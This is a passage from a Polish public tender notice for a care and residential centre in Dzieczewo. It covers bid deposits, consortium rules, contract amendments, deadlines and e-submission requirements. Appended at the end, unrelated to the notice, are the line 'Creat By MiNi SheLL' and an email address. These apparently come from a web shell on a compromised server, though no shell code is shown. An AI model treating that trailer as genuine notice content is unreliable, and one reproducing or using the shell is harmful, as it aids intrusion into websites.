osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, o których mowa<br/>powyżej wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia, niezbędnych do<br/>wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o<br/>podstawie do dysponowania tymi osobami (odpowiednio do postawionych warunków udziału w<br/>postępowaniu).<br/>Wykaz osób przygotowany wg Załącznika nr 7 do SWZ.<br/>Uprawnienia, o których mowa powyżej, powinny być zgodne z ustawą z dnia 7 lipca 1994r. Prawo<br/>budowlane (Dz. U. z 2020r. poz. 1333, ze zm.)<br/>lub ważne odpowiadające im uprawnienia nadane na podstawie wcześniej obowiązujących przepisów.<br/>W przypadku wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w<br/>innych państwach, na zasadach określonych w art.12a ustawy z dnia 7 lipca 1994r. Prawo budowlane,<br/>z uwzględnieniem postanowień ustawy z<br/>dnia 22.12.2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (Dz. U. z 2020,<br/>poz. 220, ze zm.).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1. Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania, wzór stanowi<br/>Załącznik nr 2 do SWZ.<br/>4. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, wzór stanowi<br/>Załącznik nr 3 do SWZ.<br/>5 Zobowiązanie podmiotu udostępniającego zasoby, na które powołuje się Wykonawca, celem<br/>spełnienia warunków udziału w postępowaniu.<br/>6. Oświadczenie, zgodne z art. 117 ust 4 ustawy Pzp (dot. Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia) wskazujące, które roboty budowlane wykonają poszczególni Wykonawcy (oświadczenie wg wzoru Wykonawcy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia wadium w wysokości 20000,00 zł brutto.<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2.<br/>3. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>4. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2019 r. poz. 310, 836 i 1572).<br/>5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego. Nr rachunku: 58 8233 0004 0000 1629 2016 0010 z dopiskiem „wadium dot. postępowania 271.1.2.2022 - „Utworzenie Centrum Opiekuńczo - Mieszkalnego w Dzieczewie.”<br/>6. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>7. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, wykonawca przekazuje<br/>zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>8. Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia<br/>wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą;<br/>2) zawarcia umowy w sprawie zamówienia publicznego;<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>9. Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku (wg zasad komunikacji wskazanej w rozdziale 7 SWZ, zwraca wadium wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku, gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>10. Złożenie wniosku o zwrot wadium, o którym mowa powyżej, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w ustawie Pzp.<br/>11. Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z<br/>umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty<br/>prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek<br/>bankowy wskazany przez wykonawcę.<br/>12. Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie<br/>gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium. Zaleca się umieszczenie w treści dokumentu wadium wnoszonego w formie gwarancji lub poręczenia, adresu poczty<br/>elektronicznej, na który Zamawiający może przesłać oświadczenie o zwolnieniu wadium.<br/>Pozostałe informacje zawarto w SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Spełnianie warunków udziału przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, konsorcjum.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, konsorcjum<br/>Wykonawców dokumenty wymienione w pkt VIb ppkt 4.1. i 4.2 SWZ składa ten Wykonawca,<br/>członek konsorcjum, który wykazuje spełnienie odpowiedniego warunku udziału w<br/>postępowaniu. Oznacza to, że Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,<br/>konsorcjum Wykonawców, wykazują spełnienie warunków:<br/>a) przez jednego Wykonawcę – w zakresie posiadania osoby do realizacji zamówienia i/lub<br/>doświadczenia,<br/>lub<br/>b) łącznie przez 2 lub więcej Wykonawców/łącznie przez wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (np. doświadczenie – wykaz wykonany robót<br/>budowlanych wykazuje jeden z Wykonawców, osoby wymagane na spełnienie warunku udziału<br/>inni Wykonawcy).<br/>Ponadto, zgodnie z art. 117 ust 4 ustawy Pzp, Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia, dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, w tym<br/>usługę zaprojektowania, wykonają poszczególni Wykonawcy (oświadczenie wg wzoru<br/>Wykonawcy).<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie:<br/>- o niepodleganiu wykluczeniu składa każdy z Wykonawców, oraz podmiot trzeci (jeżeli dotyczy)<br/>na którego potencjał powołuje się Wykonawca,<br/>- o spełnieniu warunków udziału w postępowaniu, składa Wykonawca/Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, który/którzy spełnia/ją dany warunek w postępowaniu<br/>oraz podmiot trzeci (jeżeli dotyczy), na którego potencjał powołuje się Wykonawca. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający na podstawie art. 455 ustawy Prawo zamówień publicznych dopuszcza<br/>możliwość zmiany umowy w zakresie:<br/>1) Terminu wykonania zamówienia, o którym mowa w §3, za zgodą stron w przypadku:<br/>a) zaistnienia po zawarciu umowy siły wyższej, przez którą, na potrzeby niniejszej umowy<br/>rozumieć należy zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej:<br/>- o charakterze niezależnym od Stron,<br/>- którego Strony nie mogły przewidzieć przed zawarciem Umowy,<br/>- którego nie można uniknąć, ani któremu Strony nie mogły zapobiec, przy zachowaniu należytej<br/>staranności,<br/>Za siłę wyższą warunkującą zmianę Umowy uważać się będzie w szczególności: okoliczności związane z wystąpieniem COVID-19, powódź, pożar i inne klęski żywiołowe, zamieszki, strajki,<br/>ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe<br/>przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia.<br/>b) dokonania w trakcie realizacji zmian dokumentacji projektowej i specyfikacji technicznych<br/>wykonania i odbioru robót budowlanych, koniecznych do wykonania przedmiotu umowy,<br/>c) wystąpienia opóźnień wynikających z odmowy lub opóźnienia wydania przez organy<br/>administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień, opinii z przyczyn<br/>niezawinionych przez Wykonawcę,<br/>v) wydania postanowienia o wstrzymaniu robót budowlanych przez uprawnione organy<br/>administracji publicznej lub samorządowej.<br/>e) zmian spowodowanych nieprzewidzianymi w SWZ warunkami pogodowymi w tym ujemnymi<br/>temperaturami, długotrwałymi opadami atmosferycznymi, warunkami geologicznymi,<br/>archeologicznymi lub terenowymi,<br/>f) wstrzymania robót przez Inspektora nadzoru na wniosek kierownika robót na skutek<br/>wystąpienia warunków atmosferycznych, terenowych lub wodnych, utrudniających wykonanie<br/>umowy, które spowodowały niezawinione i niemożliwe do uniknięcia przez Wykonawcę<br/>opóźnienie, w szczególności długotrwałe opady atmosferyczne, wysokie stany wód gruntowych,<br/>lokalne podtopienia, stany zagrożenia powodziowego trwających dłużej niż 10 dni<br/>kalendarzowych.<br/>2) W przypadku wystąpienia którejkolwiek z okoliczności wymienionych pkt. 1 lit. a-e, termin<br/>wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia<br/>wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych<br/>okoliczności. Wydłużenie terminu realizacji umowy nie powoduje zwiększenia wynagrodzenia<br/>Wykonawcy wynikającego ze złożonej oferty.<br/>3) wysokości wynagrodzenia z uwagi na:<br/>a) wzrost albo zmniejszenie stawki VAT. Jeśli zmiana stawki VAT będzie powodować<br/>zwiększenie kosztów wykonania robót po stronie Wykonawcy, Zamawiający dopuszcza<br/>możliwość zwiększenia wynagrodzenia Wykonawcy o kwotę równą różnicy w kwocie podatku<br/>VAT zapłaconego przez Wykonawcę. Jeśli zmiana stawki VAT będzie powodować zmniejszenie<br/>kosztów wykonania robót po stronie Wykonawcy, Zamawiający dopuszcza możliwość<br/>zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT zapłaconego przez<br/>Wykonawcę;<br/>2. Przewiduje się dokonanie zmiany treści umowy, jeżeli zmiany dotyczą realizacji dodatkowych<br/>robót budowlanych od dotychczasowego wykonawcy, nieobjętych zamówieniem podstawowym,<br/>o ile stały się niezbędne i zostały spełnione łącznie następujące warunki:<br/>1) zmiana wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych,<br/>w szczególności dotyczących zamienności lub interoperacyjności sprzętu, usług lub instalacji,<br/>zamówionych w ramach zamówienia podstawowego,<br/>2) zmiana wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów<br/>dla Zamawiającego,<br/>3) wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy,<br/>Pozostałe zapisy znajdują się w Projektowanych postanowieniach umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://app.sidaspzp.pl https://zamowienia.sidaspzp.pl/zamawiajacy/gmina-siemiatkowo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-22 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> A) Wymagania w zakresie zatrudnienia osób, o których mowa w art. 95 ust. 1 ustawy Pzp:<br/>1. Zamawiający wymaga, aby Wykonawca lub podwykonawcy przy realizacji przedmiotu Umowy<br/>zatrudniali na umowę o pracę w rozumieniu przepisów Kodeksu Pracy, osoby wykonujące<br/>poniżej wskazane czynności:<br/>a) wykonanie prac konstrukcyjnych,<br/>b) wykonanie prac wykończeniowych,<br/>c) wykonanie prac instalacyjnych,<br/>d) montaż urządzeń.,<br/>jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art.22 §1<br/>ustawy z dnia 26.06.1974 r – Kodeks pracy (t.j. Dz. U. z 2020 r., poz. 1320 ze zm.).<br/>B) Wykonawca może złożyć tylko jedną ofertę. Oferta może być złożona tylko do upływu terminu<br/>składania ofert.<br/>1. Zamawiający, zgodnie z § 2 ust. 1 Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie(dalej „Rozporządzenie”) § 4<br/>Rozporządzenia Rady Ministrów w sprawie użycia środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego oraz udostępniania i przechowywania<br/>dokumentów elektronicznych (Dz. U. z 2017r. poz. 1320, dalej „Rozporządzenie”) zaleca<br/>podpisywanie dokumentów PDF formatem PAdES. Dodatkowo informuje, że:<br/>1.1. pliki podpisane przy pomocy podpisu zewnętrznego XAdES należy załączać wraz z plikiem<br/>podpisu,<br/>1.2. formularz oferty podpisany przy użyciu podpisu zewnętrznego XAdES należy dodać w jeden<br/>z poniższych sposobów:<br/>1.2.1. z poziomu zakładki „Moja oferta” w miejscu do dodania pliku oferty należy umieścić plik,<br/>który był podpisywany, a plik z podpisem należy dodać oddzielnie jako załącznik,<br/>1.2.2. spakować jako plik oferty i plik z podpisem do paczki „zip” i dołączyć z poziomu zakładki<br/>„Moja oferta” w miejscu do dodania pliku oferty.<br/>2. Zamawiający, zgodnie z § 3 ust. 3 Rozporządzenia określa niezbędne wymagania sprzętowoaplikacyjne<br/>umożliwiające pracę na Platformie ZP tj.:<br/>2.1. Niezbędne wymagania sprzętowo-aplikacyjne:<br/>2.1.1. dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s,<br/>2.1.2. komputer klasy PC lub MAC o następującej konfiguracji: pamięć ram min. 3 GB RAM,<br/>procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i<br/>MacOS 10.12 – lub nowsze wersje;<br/>2.1.3. zainstalowana przeglądarka internetowa: Firefox ver. 78 i późniejsze, Chrome ver 83 i<br/>późniejsze, Opera ver. 69 i późniejsze,<br/>2.1.4. włączona obsługa JavaScript,<br/>2.1.5. Zainstalowany program do obsługi formatów .pdf np. Acrobat Reader,<br/>2.1.6. Dopuszczalne formaty przesłanych danych tj. plików o wielkości do 100 MB to: png, jpg,<br/>jpeg, gif, doc, docx, xls, xlsx, ppt, pptx, odt, ods, odp, odf, pdf, zip, 7zip, txt, ath, xml, dwg,<br/>xades, tar, 7z, eml, msg<br/>W oparciu o zapisy pkt 4 załącznika nr 2 do rozporządzenia Rady Ministrów w sprawie<br/>Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany<br/>informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych (tekst jednolity: Dz.U. z 2017, poz. 2247) nie dopuszcza się kompresji pliku<br/>archiwum w formacie RAR.<br/>2.1.7. Informacja odnośnie kodowania i czasu odbioru danych:<br/>2.1.7.1. Plik załączony przez wykonawcę na Platformie ZP i zapisany nie jest widoczny dla<br/>Zamawiającego, ponieważ w systemie występuje jako plik zaszyfrowany.<br/>2.1.7.2. Jako czas złożenia oferty przez Platformie ZP przyjmuje się moment kliknięcia w opcję<br/>„Złóż ofertę”. Czas jest prezentowany w (hh:mm:ss) zgodnie ze strefą czasową ustawioną na<br/>komputerze.<br/>2.2. Czas serwera jest synchronizowany z czasem udostępnionym przez Główny Urząd Miar.<br/>A-B) Pozostałe informacje zawarto w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com